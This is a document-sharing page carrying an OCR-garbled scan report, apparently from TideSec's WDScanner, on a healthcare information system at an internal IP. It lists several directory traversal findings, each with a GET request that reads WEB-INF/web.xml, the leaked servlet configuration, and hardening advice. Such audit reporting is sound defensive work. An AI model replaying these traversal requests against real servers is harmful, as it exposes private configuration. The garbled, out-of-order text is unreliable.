基層醫(yī)療衛(wèi)生信息系統(tǒng) (3)

資源ID：52044197 資源大?。?span id="t5gvh7l" class="font-tahoma">76.84KB 全文頁(yè)數(shù)：69頁(yè)
資源格式： DOCX 下載積分：20積分

快捷下載

會(huì)員登錄下載

微信登錄下載

三方登錄下載：

微信掃一掃登錄

下載資源需要20積分

郵箱/手機(jī)：
溫馨提示：	用戶(hù)名和密碼都是您填寫(xiě)的郵箱或者手機(jī)號(hào)，方便查詢(xún)和重復(fù)下載（系統(tǒng)自動(dòng)生成）
支付方式：
驗(yàn)證碼：	換一換

賬號(hào)：
密碼：
驗(yàn)證碼：	換一換
當(dāng)日自動(dòng)登錄忘記密碼？

友情提示

1、下載資料失敗解決辦法

2、PDF文件下載后，可能會(huì)被瀏覽器默認(rèn)打開(kāi)，此種情況可以點(diǎn)擊瀏覽器菜單，保存網(wǎng)頁(yè)到桌面，就可以正常下載了。

3、本站不支持迅雷下載，請(qǐng)使用電腦自帶的IE瀏覽器，或者360瀏覽器、谷歌瀏覽器下載即可。

4、本站資源下載后的文檔和圖紙-無(wú)水印,預(yù)覽文檔經(jīng)過(guò)壓縮，下載后原文更清晰。

5、試題試卷類(lèi)文檔，如果標(biāo)題沒(méi)有明確說(shuō)明有答案則都視為沒(méi)有答案，請(qǐng)知曉。

網(wǎng)站客服

侵權(quán)投訴

基層醫(yī)療衛(wèi)生信息系統(tǒng) (3)

http:/10.8.3.187:9001/phis/web應(yīng)用安全檢測(cè)報(bào)告TideSec安全團(tuán)隊(duì)2020年08月12日<servlet-name>rpcServer</servlet-name<servlet-class>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name><url-pattern>/rpc/*/url-pattern></servlet-mapping<!一 <servlet><servlet-name>AuthorizationServlet</servletname><servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servletname><servletclass>ctd.oauth. AuthLogon</servlet-class></servlet>servlet-mappingsservlet-name>AuthorizationServlet</servlet-name><urlpattern>/oauth/authorize</url-pattern></serv1e t-mapp i ngs ><servlet-mappings><servlet-name>AuthLogon</servletname><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings -><servlet><servlet-name>HttpForward</servletname><servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servletmapping><servlet-name>HttpForward</servletname><url-pattern>/forward/*/url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/phis/css/images/./././WEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾（點(diǎn)）等可能的惡意字符：這個(gè)試用于能夠修改線(xiàn)上代碼，最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式，看輸入的格式是否合法：這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致，但是有很大難度，需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir：這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄，作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.4目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞，允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/sencha/ext3/css風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName/./././WEB-INF/web.xml?.Original directory: /phis/resources/sencha/ext3/cssDirectory traversal pattern found:<webapp xmlns=z，http: /java. sun. com/xml/ns/javaee/zxmlns: xsi=/，http:/www. w3. org/2001/XMLSchema-instancez，xsi: schemaLocation=z/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp_2_5.xsdversion二2. 5><context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value></context-param><context-param>param-name1og4jConfigLocati on</param-name><paramvalue>classpath:phis/spring/log4j. properties</param-value></context-param><context-param><param-name>log4jRefreshInterval</param-name><param-value>6000</param-value></context-param><listener><listenerclass>org. springframework, web. util. Log4jConfigListener</listener-class</listener><listener><listener-class>ctd.mvc.controller, util. MVCSessionListener</listenerclass></listener><servlet><servlet-name>springServlet</servlet-name ><servletclass>org. springframework, web. servlet. DispatcherServlet</servlet-class><init-param><param-name>contextConfigLocation</param-name><param-value>classpath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一一></param-value></init-param>load-on-startup1/load-on-startup</servlet><servlet-mapping><servlet-name>springServlet</servlet-name ><url-pattern>/</url-pattern></servlet-mapping<servlet><servlet-name>rpcServer</servlet-name<servletclass>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><paramvalue>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servletmapping><servlet-name>rpcServer</servlet-name<url-pattern>/rpc/*</url-pattern></servlet-mapping<!一一 <servlet><servletname>AuthorizationServlet</servlet-name<servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servletname><servlet-class>ctd. oauth. AuthLogon</servlet-class></servlet><servlet-mappings><servletname>AuthorizationServlet</servletname><url-pattern>/oauth/authorize</url-pattern></servlet-mappings>servlet-mappings<servlet-name>AuthLogon</servlet-name><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings 一><servlet><servlet-name>HttpForward</servletname>servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servlet-mapping><servlet-name>HttpForward</servlet-name<url-pattern>/forward/*</url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/sencha/ext3/css/./././WEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾.（點(diǎn)）等可能的惡意字符：這個(gè)試用于能夠修改線(xiàn)上代碼，最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式，看輸入的格式是否合法：這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致，但是有很大難度，需要大量時(shí)間配置規(guī)則。php.ini配置open basedir：這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄，作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.5目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞，允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/app風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName)/./WEB-INF/web.xml?.Original directory: /phis/resources/appDirectory traversal pattern found:<webapp xmlns=z/http: /java. sun. com/xml/ns/javaeez/xmlns: xsi=http:/www w3. org/2001/XMLSchema-instance/zxsi : schemaLocation=z/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/web-app_2_5. xsdversion=2. 5><context-param><param-name>webAppRootKey</param-nanie><param-value>phis. root</param-value></context-param><context-param><param-name>log4jConfigLocation</param-name><param-value>classpath:phis/spring/log4j. properties</param-value></context-param>contextparam<param-name>log4jRefreshInterval</parani-name><param-value>6000</param-value</context-param><listener><listener-class>org. springframework, web. util. Log4jConfigListener</listener-class></listener><listener><listenerclass>ctd.mvc.controller, util. MVCSessionListener</listener-class></listener><servlet><servlet-name>springServlet</servlet-name><servletclass>org. springframework, web. servlet. DispatcherServlet</servlet-class<init-param><paramname>contextConfigLocation</param-name>param-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一>/param-value</init-param><load-on-startup>l</load-on-startup></servlet>servlet-mapping<servlet-name>springServlet</servlet-name><url-pattern>/</url-pattern></serv1e t-mapp i ng><servlet><servlet-name>rpcServer</servlet-name<servletclass>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name><url-pattern>/rpc/*/urlpattern></servlet-mapping<!一 <servlet><servletname>AuthorizationServlet</servlet-name><servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servlet-name>servlet-class>ctd. oauth. AuthLogon</servlet-class></servlet><servletmappings><servlet-name>AuthorizationServlet</servlet-name<urlpattern>/oauth/authorize</url-pattern></servlet-mappingsservlet-mappings<servlet-name>AuthLogon</servlet-name><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings 一><servlet><servlet-name>HttpForward</servlet-name<servletclass>phis. source, controller. HttpControllerForward</servlet-class</servlet><servlet-mapping><servlet-name>HttpForward</servletname><url-pattern>/forwardA</url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/app/.AVEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾（點(diǎn)）等可能的惡意字符：這個(gè)試用于能夠修改線(xiàn)上代碼，最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式，看輸入的格式是否合法：這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致，但是有很大難度，需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir：這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄，作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.6目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞，允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/element風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $(dirName/./WEB-INF/web.xml?.Original directory: /phis/resources/elementDirectory traversal pattern found:<webapp xmlns=/，http: /java. sun. com/xml/ns/javaee，zxmlns:xsi=http:/www. w3. org/2001/XMLSchema一instance”xsi : schemaLocation=/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp_2_5. xsdversion=2. 5><context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value</context-param><context-param>param-name1og4jConfigLocati on</param-name ><paramvalue>classpath:phis/spring/log4j. properties</param-value></context-param<context-param><param-name>log4jRefreshInterval</param-name><param-value>6000</param-value></context-param><listener><listenerclass>org.springframework, web. util. Log4jConfigListener</listenerclass></listener><listener><listener-class>ctd.mvc.controller, util. MVCSessionListener</listenerclass></listener><servlet><servlet-name>springServlet</servlet-name >servlet-class>org. springframework, web. servlet. DispatcherServlet</servlet-class><init-param><param-name>contextConfigLocation</param-name>param-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring. xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一一></param-value></init-param>1. 評(píng)估綜述本次評(píng)估對(duì)象為：網(wǎng)站URL： http:/10. 8. 3. 187:9001/phis/網(wǎng)站標(biāo)題：基層醫(yī)療衛(wèi)生信息系統(tǒng)IP地址：ErrorWEB安全掃描結(jié)果：高危漏洞：18個(gè)中危漏洞：6個(gè)低危漏洞：0個(gè)頁(yè)面安全檢測(cè)結(jié)果：URL總數(shù)：52動(dòng)態(tài)URL： 1暗鏈頁(yè)面：敏感字頁(yè)面：壞鏈頁(yè)面：快照頁(yè)面：信息泄露測(cè)試結(jié)果：開(kāi)放端口： Error個(gè)子域名：1個(gè)敏感信息：02. WDScanner簡(jiǎn)介近幾年，隨著互聯(lián)網(wǎng)各種安全漏洞愈演愈烈，OPENSSL心臟滴血漏洞、JAVA反序列化漏洞、STRUTS命令執(zhí)行漏洞、ImageMagick命令執(zhí)行漏洞等高危漏洞頻繁爆發(fā)。在這種情況下，為了能在漏洞爆發(fā)后快速形成漏洞檢測(cè)能力，同時(shí)能對(duì)網(wǎng)站或主機(jī)進(jìn)行全面快速的安全檢測(cè)，TideSec安全團(tuán)隊(duì)開(kāi)發(fā)了分布式web安全監(jiān)測(cè)平臺(tái)WDScanneroWDScanner平臺(tái)主要包括如下功能：分布式web漏洞掃描、客戶(hù)管理、漏洞定期掃描、網(wǎng)站爬蟲(chóng)、暗鏈檢測(cè)、網(wǎng)站指紋識(shí)別、漏洞定向檢測(cè)、代理搜集及部署、密碼定向破解、社工庫(kù)查詢(xún)等功能。<load-on-startup>l</load-on-startup></servlet><servlet-mapping><servlet-name>springServlet</servlet-name ><url-pattern>/</url-pattern></servlet-mapping<servlet><servlet-name>rpcServer</servletname><servletclass>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><paramvalue>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servletmapping><servlet-name>rpcServer</servlet-name><urlpattern>/rpc/*/url-pattern></servlet-mapping><!一一 <servlet>servlet-name>AuthorizationServlet</servlet-name><servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servlet-name><servlet-class>ctd.oauth. AuthLogon</servlet-class></servlet>servlet-mappings<servletname>AuthorizationServlet</servletname><urlpattern>/oauth/authorize</url-pattern></servlet-mappings>servlet-mappings<servlet-name>AuthLogon</servlet-name<url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings 一><servlet><servlet-name>HttpForward</servletname>servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servlet-mapping><servlet-name>HttpForward</servlet-name<url-pattern>/forward/*</url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/element/./WEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾.（點(diǎn)）等可能的惡意字符：這個(gè)試用于能夠修改線(xiàn)上代碼，最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式，看輸入的格式是否合法：這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致，但是有很大難度，需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir：這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄，作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.7目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞，允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/phis風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName/./WEB-INF/web.xml?.Original directory: /phis/resources/phisDirectory traversal pattern found:<webapp xmlns=/http: /java. sun. com/xml/ns/javaee，/xmlns:xsi=http:/www. w3. org/2001/XMLSchemainstance”xsi:schemaLocation二http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp 2 5.xsdversion2. 5><context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value></context-param><context-param><param-name>log4jConfigLocation</param-name ><paramvalue>classpath:phis/spring/log4j. properties</param-value></context-param><context-param><param-name>log4jRefreshInterval</param-name><param-value>6000</param-value</context-param><listener><listenerclass>org. springframework, web. util. Log4jConfigListener</listener-class</listener><listener><listener-class>ctd.mvc. controller, util. MVCSessionListener</listenerclass</listener><servlet><servlet-name>springServlet</servlet-name ><servlet-class>org. springframework, web. servlet. DispatcherServlet</servlet-class><init-param><paramname>contextConfigLocation</param-name><param-value>classpath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一>/param-value</init-param><load-on-startup>l</load-on-startup></servlet><serv1et-mapping><servlet-name>springServlet</servlet-name><url-pattern>/</url-pattern></serv1et-mapp i ng><servlet><servlet-name>rpcServer</servlet-name><servlet-class>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name>param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name<url-pattern>/rpc/*/urlpattern></servlet-mapping<!一一 <servlet><servlet-name>AuthorizationServlet</servlet-name<servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servlet-name><servletclass>ctd. oauth. AuthLogon</servletclass></servlet>servlet-mappingsservlet-name>AuthorizationServlet</servletname><url-pattern>/oauth/authorize</url-pattern></servlet-mappings><servlet-mappings><servlet-name>AuthLogon</servlet-name><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings -><servlet><servlet-name>HttpForward</servlet-name<servletclass>phis. source, controller. HttpControllerForward</servletclass></servlet><serv1et-mapping><servlet-name>HttpForward</servlet-name<url-pattern>/forward/*/url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/phis/./WEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾.（點(diǎn)）等可能的惡意字符：這個(gè)試用于能夠修改線(xiàn)上代碼，最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式，看輸入的格式是否合法：這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致，但是有很大難度，需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir：這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄，作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.8目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞，允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/app/desktop風(fēng)險(xiǎn)參數(shù)This file was found using the pattern $dirName)/././WEB-INF/web.xml?.Original directory: /phis/resources/app/desktopDirectory traversal pattern found:<webapp xmlns=z，http: /java. sun. com/xml/ns/javaee/zxmlns:xsi=，http:/www. w3. org/2001/XMLSchemainstance”xsi: schemaLocation=，/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp_2_5.xsdversion2. 5>測(cè)試詳情<context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value></context-param><context-param><param-name>log4jConfigLocati on</param-name ><param-value>classpath:phis/spring/log4j. properties</param-value></context-param><context-param><param-name>log4jRefreshInterval</parani-name><param-value>6000</param-value</context-param><listener><listenerclass>org. springframework, web. util. Log4jConfigListener</listener-class</listener><listener><listenerclass>ctd.mvc.controller, util. MVCSessionListener</listenerclass></listener><servlet><servlet-name>springServlet</servlet-name ><servlet-class>org. springframework, web. servlet. DispatcherServlet</servlet-class<initparam><param-name>contextConfigLocation</param-name>param-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring. xml<! -classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一一>/param-value</init-param><load-on-startup>l</load-on-startup></servlet><servlet-mapping><servlet-name>springServlet</servlet-name ><url-pattern>/</url-pattern></servlet-mapping<servlet><servlet-name>rpcServer</servlet-name<servlet-class>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name><url-pattern>/rpc/*/url-pattern></servlet-mapping<!一 <servlet><servlet-name>AuthorizationServlet</servletname><servlet-class>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servletname><servletclass>ctd. oauth. AuthLogon</servlet-class></servlet>servlet-mappingsservlet-name>AuthorizationServlet</servlet-name><urlpattern>/oauth/authorize</url-pattern></serv1e t-mapp i ngs ><servlet-mappings><servlet-name>AuthLogon</servletname><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings -><servlet><servlet-name>HttpForward</servletname><servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servletmapping><servlet-name>HttpForward</servletname><url-pattern>/forward/*/url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/app/desktop/./.AVEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾（點(diǎn)）等可能的惡意字符：這個(gè)試用于能夠修改線(xiàn)上代碼，最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式，看輸入的格式是否合法：這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致，但是有很大難度，需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir：這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄，作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.9目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞，允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName/./WEB-INF/web.xml?.Original directory: /phis/resourcesDirectory traversal pattern found:<webapp xmlns=z，http: /java. sun. com/xml/ns/javaee/zxmlns: xsi=/，http:/www. w3. org/2001/XMLSchema-instancez，xsi: schemaLocation=z/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/we

注意事項(xiàng)

本文（基層醫(yī)療衛(wèi)生信息系統(tǒng) (3)）為本站會(huì)員（黑**）主動(dòng)上傳，裝配圖網(wǎng)僅提供信息存儲(chǔ)空間，僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理，對(duì)上載內(nèi)容本身不做任何修改或編輯。若此文所含內(nèi)容侵犯了您的版權(quán)或隱私，請(qǐng)立即通知裝配圖網(wǎng)（點(diǎn)擊聯(lián)系客服），我們立即給予刪除！

溫馨提示：如果因?yàn)榫W(wǎng)速或其他原因下載失敗請(qǐng)重新下載，重復(fù)下載不扣分。